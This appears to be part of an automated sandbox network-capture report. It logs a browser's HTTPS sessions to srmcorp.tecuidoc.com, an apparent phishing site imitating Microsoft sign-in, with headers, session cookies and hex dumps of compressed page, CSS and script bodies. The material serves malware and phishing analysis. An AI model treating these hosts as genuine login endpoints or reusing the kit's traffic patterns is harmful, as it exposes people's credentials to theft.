                                              2024-04-26 14:56:34 UTC16384INData Raw: 21 4d 39 c5 f7 3c 9f 2c 0b 0e 0d d1 a0 f4 d4 12 25 e6 48 e3 c5 60 1d bd df 09 98 7f fd 53 ec cd 7c 8e 07 d0 3f 5f 48 06 35 02 5f 0b 28 2b a7 30 ae 0f 95 fa c7 38 cd 5e f3 ef a1 fe 1f 4d 9f 35 c2 5f 96 63 58 24 db 80 5f de 1a ba 6f c3 54 d5 f3 16 0a ff 0e f4 1b 8a ef f9 d8 73 8c a5 b9 15 ea 30 15 58 48 ad 50 8e 4b 35 cb d4 25 aa 72 09 58 cb 81 02 d3 29 1a e3 38 8b 61 0d c0 d5 c0 cf ac 5f 2f cd 62 b9 76 3f 05 bd 0d e6 2b 00 cb 34 c7 ea f4 45 eb 99 5a 54 4e a4 c6 4c a4 3a 88 df 39 44 5f 49 2f 54 0b 6e f0 37 6b cb 73 85 09 b6 d9 61 23 28 43 f3 12 98 ce 5b 20 99 4f 84 85 1b b6 51 96 c2 62 14 e0 44 f2 25 95 31 4f d2 26 6d bf 5b 92 5b b5 07 4b b3 65 db e8 5b 50 aa 3b 94 2b c4 49 29 98 9d b7 40 a0 c1 c7 de 3d 86 6a 30 6c 56 1f b9 7a ee 01 a1 1e 46 23 62 17 9a 55
                                              Data Ascii: !M9<,%H`S|?_H5_(+08^M5_cX$_oTs0XHPK5%rX)8a_/bv?+4EZTNL:9D_I/Tn7ksa#(C[ OQbD%1O&m[[Ke[P;+I)@=j0lVzF#bU
                                              2024-04-26 14:56:34 UTC16384INData Raw: 31 1a c8 40 d4 d7 ea 49 d3 1f 89 75 c6 99 20 0f 5b 61 2b 05 28 6d 9f 3e 8d 24 44 da af 89 08 c2 39 04 06 c8 8d 7a 0b d7 70 9c f4 fc 66 70 1e 5d 21 88 6e 76 83 2c be 35 bc d2 0d 4e fa 42 6b b9 07 00 25 ce dd 4c 26 c7 a8 cf 76 e1 9d 29 b0 da 30 56 a6 fe cb 59 c0 b1 39 18 07 ec 7f c1 ec 72 73 dd bd b4 eb 68 85 00 81 97 33 4e 4d cc 0e f7 f4 7b c5 91 4f ec f0 4a d5 8e 05 ea bb a1 e0 dc 11 a9 07 a3 dd 01 ef 50 fd 1c 3c 70 86 e9 d0 79 a0 e9 d8 34 19 ac 18 cb 03 b8 e6 4a 5e d1 24 ab 54 c0 e5 3d 87 64 85 35 d3 ce ab a2 3c 62 69 0d 5c 62 ea ce fd e5 88 19 3a 7f 29 ab fe 3e e7 ac cf aa 22 5f 94 35 e9 d6 24 9f e7 71 be d3 01 62 7f a9 49 ab 21 b6 ae 33 9c 0f 9d 01 2d 9e 01 77 c6 1b 44 05 4d 5b 71 c3 d9 b1 d9 db 0a df a0 59 d3 df a8 df 55 a1 7b 0d ca 3c b0 e8 ba 5a 00
                                              Data Ascii: 1@Iu [a+(m>$D9zpfp]!nv,5NBk%L&v)0VY9rsh3NM{OJP<py4J^$T=d5<bi\b:)>"_5$qbI!3-wDM[qYU{<Z
                                              2024-04-26 14:56:34 UTC3179INData Raw: e6 ca 66 13 29 70 e5 f9 e6 86 12 d0 f6 b1 36 cc 4d 85 62 e6 bb 58 5f ec ba 86 86 dc de 9e 51 5f 90 6d 1e 00 f3 ca 10 44 5b 32 92 cb 5e 7d f9 16 cf d9 23 77 2d 4c aa 74 b4 ee 63 6b 1b ed d4 93 0f df 00 8f fd 67 39 8c 12 db 11 28 c4 f6 a9 af be 79 35 39 e4 86 7b 81 fb 65 9f e7 5d f4 a7 5b c0 26 bf 4b 1a 35 01 17 cf e5 17 72 ae 7a d9 e8 af 8c 0b 0c 6b 95 a1 ef 4c e3 da 87 3d 55 31 47 b4 da 15 93 a2 23 57 93 a2 cc e8 d0 89 c3 a5 ee 24 5f eb e4 a3 8d 22 5e b3 3e f1 3b 9a df bf 7f e4 4e d9 a7 04 25 84 88 0a 54 22 56 da 41 78 e3 e6 58 12 60 f5 fa 1b 79 f0 7f a2 99 e0 ed a5 51 4d c8 7f 05 00 a1 83 f7 98 c6 13 9b 4e dc f7 02 7e 08 40 9e 85 83 1c 1f 8d 87 ee 0c 10 d3 a3 b7 f5 29 ca 35 72 82 81 85 e8 b7 e2 70 2d a1 bf d8 1c 34 38 75 e7 69 df b0 4c 54 f8 d6 29 1c f4
                                              Data Ascii: f)p6MbX_Q_mD[2^}#w-Ltckg9(y59{e][&K5rzkL=U1G#W$_"^>;N%T"VAxX`yQMN~@)5rp-48uiLT)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.649721198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:35 UTC698OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                              Sec-WebSocket-Key: z7viM0HUoFol1ipMJjwh7A==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:56:37 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: bd52b8c9-42c0-40ae-8ab7-34ad062ecf00
                                              x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.649722198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:35 UTC887OUTGET /?PSZlk=ViP&sso_reload=true HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Referer: https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                              2024-04-26 14:56:39 UTC781INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 61081
                                              Connection: close
                                              cache-control: no-store, no-cache
                                              pragma: no-cache
                                              vary: Accept-Encoding
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: 4243ab28-bc8e-4768-bf72-979e84711401
                                              x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:39 UTC15603INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd d9 56 e3 ca b2 28 fa 3e bf c2 78 cc 0d d6 46 18 f7 18 bb 34 d9 c6 74 2e 30 50 d8 f4 9b c1 90 a5 b4 2d 90 25 97 1a 0c 14 f6 db fd 92 fb 70 c7 79 b8 6f f7 0f d6 8f dd 88 c8 54 67 9b 9a b5 9a 7d 9a b1 e7 1c 6b 15 52 2a 9b c8 c8 e8 33 32 fd 65 65 ef ac d9 bd 3d df 4f 0d bd 91 f9 c7 6f 5f f0 4f 4a 33 55 d7 55 d2 e9 94 6e 38 4a da f4 9c 74 ca 54 ad 81 92 66 56 fa 8f df 52 5f 86 4c d5 e1 6f ea 8b 67 78 26 c3 a7 54 c7 18 58 29 c3 4a 79 76 ea cd f6 9d 94 aa 69 b6 6f 79 58 69 33 ac f5 65 c4 3c 35 a5 d9 96 c7 2c 4f 49 7b ec d5 db c4 01 eb 29 6d a8 3a 2e f3 14 df eb 6f 54 d3 00 8c 37 de 60 df 7d e3 45 49 37 79 f5 8d ee db 98 a5 37 97 74 d3 da 57 98 3e 60 c9 56 37 1b 97 8d 8d a6 3d 1a ab 9e d1 33 97 37 9c 18 ba 37 54 74 f6 62 68 6c
                                              Data Ascii: V(>xF4t.0P-%pyoTg}kR*32ee=Oo_OJ3UUn8JtTfVR_Logx&TX)JyvioyXi3e<5,OI{)m:.oT7`}EI7y7tW>`V7=377Ttbhl
                                              2024-04-26 14:56:39 UTC14460INData Raw: d4 16 a7 3a 16 c7 7a e2 03 f2 f1 16 e9 65 91 1d 19 76 80 5b b3 c9 f8 9d 87 28 4c 80 2d d6 1e 86 d9 6f 9f 77 6f 41 41 3b 94 1a e0 49 91 18 c5 6e 3c dc 2a d4 79 a5 48 c5 bc c4 9d 8d f8 40 40 7b b4 f5 45 5d a4 0d f2 81 41 03 8a 19 48 fc 05 56 4c 3c c5 84 7d cc 0e 7d c3 de 51 6f ee 80 50 a8 25 6a 89 8d d5 9e f2 c3 b6 2e 2d 7e 97 22 b7 49 78 7a ad 6d 75 3c 7b 3c 66 fa a9 8d 3f 17 c3 d3 63 f9 27 61 58 05 e1 05 df 65 7b 0c 8c 1a 0d af 66 ee 80 dd 07 dc 6a d9 be 1b e5 42 60 e2 0f 28 b5 44 c5 53 10 54 94 1c 0e 0e ff 4a 7e 2a 4f 94 1f d1 91 be 5a d2 de 08 23 ea 98 94 61 29 85 ba b5 78 c7 10 26 29 b2 7b 6b a3 f0 10 b9 9b 98 be ca f3 61 26 59 3c 54 30 40 2b 4d dc 68 c0 63 d3 f6 0e 9f 44 cd 8e dd 69 25 ed c4 df 84 9f 65 83 eb 84 fe 0a ca 44 06 b6 46 6d a1 46 80 8e 44
                                              Data Ascii: :zev[(L-owoAA;In<*yH@@{E]AHVL<}}QoP%j.-~"Ixzmu<{<f?c'aXe{fjB`(DSTJ~*OZ#a)x&){ka&Y<T0@+MhcDi%eDFmFD
                                              2024-04-26 14:56:39 UTC16384INData Raw: 11 0d 6b 73 e6 98 95 91 3b f1 db 94 1d 6e 9b fe be 01 1c b6 99 cc 95 cf 0c 45 fb f3 ba ec 51 15 cc be 8a 89 4f 00 11 fc 7f 53 aa 8b e2 35 fe d5 08 e3 40 c1 29 90 d8 f4 bd a8 ff 0e 4e 71 97 eb 8b 5c 0a 95 e4 32 1b ff 23 78 04 5c b2 08 8f d8 eb ab 16 e2 cf 77 ab d7 6d 3a f2 e4 0e 9f c9 79 5e 0d 28 01 74 8c bf d1 eb 08 a6 87 39 5e e8 77 ae 37 20 9d d4 58 7e 92 d3 cc 8e 65 06 3e 0d 10 12 5f 45 2c 87 79 fd 0f 82 e0 77 02 cc 7b 07 e4 0e af 8a c2 b4 82 30 8e 12 34 4e 13 30 8c 49 c2 5e c5 91 91 63 76 d8 39 54 eb bd b2 32 5d 5d 9d 46 36 d1 81 93 55 3a 65 19 76 b3 fb 09 4e 6e da be 65 7c 91 85 95 40 90 e2 4d 46 19 75 18 46 99 3e ed 4b 73 69 5f 38 f7 e6 3a 69 d5 e9 47 ae 3b 04 4a f1 eb a3 b2 a4 cb b8 0c 3a 4d 4c 76 cb c9 5d de 50 f4 43 ac e8 22 fb a1 56 cc 76 99 e9
                                              Data Ascii: ks;nEQOS5@)Nq\2#x\wm:y^(t9^w7 X~e>_E,yw{04N0I^cv9T2]]F6U:evNne|@MFuF>Ksi_8:iG;J:MLv]PC"Vv
                                              2024-04-26 14:56:39 UTC14634INData Raw: 74 b3 29 56 7a 30 6f 3d 2f e9 69 d8 20 4f 43 ab 5d 46 14 0d 2e d0 ba fa 13 a9 40 ba fa c5 f7 18 39 23 e3 24 5d bd 79 c5 c2 88 61 f7 13 81 97 37 49 77 37 9e f9 26 dd ae a1 9f 65 05 31 32 42 e0 e9 0e 13 cc 71 68 d1 2d 25 7d 3c 49 6c 83 cf 9f 02 5f e7 cb ca f5 91 49 89 ef 7c 0a d4 3a 0f e2 bb 64 4c 99 96 46 9e bc 5f 0a 2c cd 16 02 79 fd 29 7b d5 81 51 19 49 03 a3 8b 7c 8c b6 f9 c9 7f f6 d0 39 e9 bc 42 2f f0 9b 52 bc 17 cd 3a 32 14 00 c4 9f 18 7a 04 85 e5 0f 2b 51 36 22 dc c4 da 72 92 06 b5 ba da 97 ef 52 7e 8b 04 fa 79 bc 21 57 13 3f 5b ce 57 9c 0e fa e9 9a ee df 40 6a 55 27 9c 00 58 a9 2e c2 68 35 09 a3 55 8d 03 12 2f c5 bc a6 8a 08 23 00 32 b0 ec 46 fa 63 44 33 65 64 14 74 d2 37 62 0f d8 3b 97 3a 96 8a 96 cc 2b b3 35 68 84 9f 52 f4 df 8a a5 4d 99 67 cd 24
                                              Data Ascii: t)Vz0o=/i OC]F.@9#$]ya7Iw7&e12Bqh-%}<Il_I|:dLF_,y){QI|9B/R:2z+Q6"rR~y!W?[W@jU'X.h5U/#2FcD3edt7b;:+5hRMg$


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.649723198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:35 UTC767OUTGET /favicon.ico HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                              2024-04-26 14:56:37 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: d7eec534-07d9-4c19-9944-2c440518d000
                                              x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.649725198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:38 UTC430OUTOPTIONS /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                              Host: 7457d826-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              Origin: https://srmcorp.tecuidoc.com
                                              Access-Control-Request-Method: POST
                                              Access-Control-Request-Headers: content-type
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:41 UTC336INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:41 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              access-control-allow-headers: content-type
                                              access-control-allow-credentials: false
                                              access-control-allow-methods: *, GET, OPTIONS, POST
                                              access-control-allow-origin: *
                                              2024-04-26 14:56:41 UTC12INData Raw: 37 0d 0a 4f 50 54 49 4f 4e 53 0d 0a
                                              Data Ascii: 7OPTIONS
                                              2024-04-26 14:56:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.649726198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:39 UTC660OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://srmcorp.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:42 UTC790INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:42 GMT
                                              Content-Type: text/css
                                              Content-Length: 20314
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 27 Dec 2023 18:18:12 GMT
                                              etag: 0x8DC07082FBB8D2B
                                              x-ms-request-id: 646a5975-901e-000f-1196-916c81000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145641Z-186b7b7b98dwld6fb7x3nn1v400000000c8000000000ke3h
                                              x-fd-int-roxy-purgeid: 0
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:42 UTC15594INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 73 e3 36 b2 e8 f7 f9 15 5c a7 52 3b ce 4a 8c 48 3d 2d 57 52 3b 99 cc 26 3e 67 5e 35 33 d9 47 a5 52 5b b4 44 59 3c 43 89 ba 24 65 8f 57 47 ff fd e2 8d 06 d0 20 29 8f b3 d9 7b 2b 27 67 13 0b dd 6c 00 dd 8d 06 1a e8 06 be fe ea 0f c1 f3 62 77 5f 66 37 eb 3a 78 fa fc 3c 78 95 2d ca a2 2a 56 35 29 2f 77 45 99 d4 59 b1 0d 83 67 79 1e 30 a4 2a 28 d3 2a 2d 6f d3 65 18 7c f5 f5 d7 5f fd e1 49 bf fb ff 05 ef 3f 3c 7b f7 21 78 f3 97 e0 c3 8f 57 ef be 0f de 92 5f ff 08 5e bf f9 70 f5 fc 45 d0 99 ca 93 27 1f d6 59 15 ac b2 3c 0d c8 7f af 93 2a 5d 06 c5 36 28 ca 20 db 2e 44 ab d3 2a d8 90 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 f4 21 cf aa 9a 7c 74 9d e6 c5 5d f0 94 90 2b 97 c1 db a4 ac ef 83 ab b7 e7 61 f0 81 e0 16
                                              Data Ascii: }ks6\R;JH=-WR;&>g^53GR[DY<C$eWG ){+'glbw_f7:x<x-*V5)/wEYgy0*(*-oe|_I?<{!xW_^pE'Y<*]6( .D*Y:ve?!|t]+a
                                              2024-04-26 14:56:42 UTC4720INData Raw: 36 3d ae 63 fa 4f 4b 7f 86 e7 bc b1 e2 92 61 7d df b0 68 ac ab 2c aa b1 88 da cb c6 22 89 f4 a2 b1 42 53 1e da 58 e7 55 1e b5 fb a5 96 31 c6 85 9c 5c 95 58 0f 77 34 04 a7 bc ef e9 bc 62 55 e4 cb 9d 46 11 60 f2 34 8a 20 ba 0a e1 1d 2d b3 ba 41 d4 6a 33 50 25 58 6c a8 15 02 68 eb 56 83 ba b5 a0 21 5d f4 aa e1 60 30 5e 26 13 b7 4f 5a e3 0c 32 50 fb 10 40 6b 9f fc 5a d9 82 86 f5 c9 a7 ad bc 4f 0f 53 c6 3e 8f 75 ef 81 fb bb e5 60 13 bf d0 d1 86 c0 d4 70 43 60 72 bc 81 ca 0c ee 7b ca cd 06 61 90 56 01 34 34 b4 0d 0f 13 81 b8 e1 dc 70 52 d0 d3 64 f3 b6 df 8a 2c 1c d2 a7 e1 c5 ec 1c b9 2b 18 00 b1 42 22 26 de 7d 9d 59 8d 1f 8e 83 89 00 6e 65 8f 64 aa a2 fc c3 d8 65 70 5f b6 f7 9c 65 7e ea 83 9d 2c f7 31 10 e4 08 df ce 47 c4 df 33 f4 3c 40 c9 2e 2b 17 af 8a ce 37
                                              Data Ascii: 6=cOKa}h,"BSXU1\Xw4bUF`4 -Aj3P%XlhV!]`0^&OZ2P@kZOS>u`pC`r{aV44pRd,+B"&}Ynedep_e~,1G3<@.+7


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.649728198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:39 UTC637OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.js HTTP/1.1
                                              Host: 7e55e394-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://srmcorp.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:43 UTC813INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:43 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 121210
                                              Connection: close
                                              cache-control: public, max-age=31536000
                                              last-modified: Wed, 27 Mar 2024 20:03:18 GMT
                                              etag: 0x8DC4E98F25B224F
                                              x-ms-request-id: b6627086-c01e-003e-6fc6-966692000000
                                              x-ms-version: 2009-09-19
                                              x-ms-lease-status: unlocked
                                              x-ms-blob-type: BlockBlob
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              access-control-allow-origin: *
                                              x-azure-ref: 20240426T145641Z-186b7b7b98d2qdz2n3kpeau6e0000000025000000000g316
                                              x-fd-int-roxy-purgeid: 4554691
                                              x-cache: TCP_HIT
                                              accept-ranges: bytes
                                              content-encoding: gzip
                                              2024-04-26 14:56:43 UTC6407INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd fb 7b e3 38 8e 00 f8 fb fd 15 8e 66 2e 63 77 14 97 e4 b7 95 56 67 5d 79 54 65 3b 89 33 71 aa bb 77 53 99 7c b2 44 3b ea c8 92 57 92 f3 18 c7 fb b7 1f 00 92 12 65 cb a9 aa d9 bd bb ef be eb 9d ad 58 24 f8 02 41 10 00 41 f0 c3 4f 3b ff 47 e5 a7 ca fe f7 ff 57 19 dd 0c ae 6f 2a c3 d3 ca cd e7 b3 eb e3 ca 15 7c fd 47 e5 72 78 73 76 74 f2 fd f5 60 a3 f8 ff 37 0f 7e 52 99 f8 01 ab c0 df b1 93 30 af 12 85 95 28 ae f8 a1 1b c5 f3 28 76 52 96 54 66 f0 6f ec 3b 41 65 12 47 b3 4a fa c0 2a f3 38 fa 93 b9 69 52 09 fc 24 85 42 63 16 44 cf 95 2a 54 17 7b 95 2b 27 4e 5f 2b 67 57 b5 3a d4 cf a0 36 7f ea 87 50 da 8d e6 af f0 fb 21 ad 84 51 ea bb ac e2 84 1e d5 16 c0 47 98 b0 ca 22 f4 58 5c 79 7e f0 dd 87 ca 85 ef c6 51 12 4d d2 4a cc 5c
                                              Data Ascii: {8f.cwVg]yTe;3qwS|D;WeX$AAO;GWo*|Grxsvt`7~R0((vRTfo;AeGJ*8iR$BcD*T{+'N_+gW:6P!QG"X\y~QMJ\
                                              2024-04-26 14:56:43 UTC16384INData Raw: b8 39 bb a0 7e 82 34 a6 d8 3a 15 78 c1 93 4f e9 3a 50 0a 62 93 92 07 9c 99 0b 9e b8 b4 3c dc 4a 20 11 77 a7 d0 bb 8c 04 77 86 96 a4 96 66 34 0d 9d fb 0c de 8b 45 8f f7 89 40 df 05 8d f7 ea ea fe e4 fe f8 e3 fd c5 c9 c5 c7 93 eb e3 e1 c9 e8 72 78 73 f2 c7 d9 08 96 e4 d1 29 fc 77 64 b6 35 0e 75 f2 c7 d1 f9 97 e3 13 58 30 3d c3 68 e1 1c 8a 0c 5e f6 fe 7c 78 f4 ab 92 6b 8a dc 8f 83 e3 fb ab c1 68 f4 fb f0 3a cf 6c c8 a2 67 a3 d1 d9 e5 27 51 05 5f bc 1c a4 69 ae 81 ac d7 d1 94 75 9c 9e 1c 9f 5c 0f 6e 68 a1 5d 9e 9f c1 c2 1d 7e 3a bb bc 3f 3e 1b 0d ce cf 87 bf cb 2e 75 7b 83 23 51 e2 ea e4 fe fa cb 39 2c d8 f3 91 68 af d5 37 64 e6 c5 f0 23 b0 8c 23 58 c1 a3 fb ab cf c3 cb 93 cb 2f 34 bc 8f e7 83 cb 5f 39 74 bb 67 98 df 80 be 19 0e 47 9f 87 c8 05 45 81 ce b7 0b
                                              Data Ascii: 9~4:xO:Pb<J wwf4E@rxs)wd5uX0=h^|xkh:lg'Q_iu\nh]~:?>.u{#Q9,h7d##X/4_9tgGE
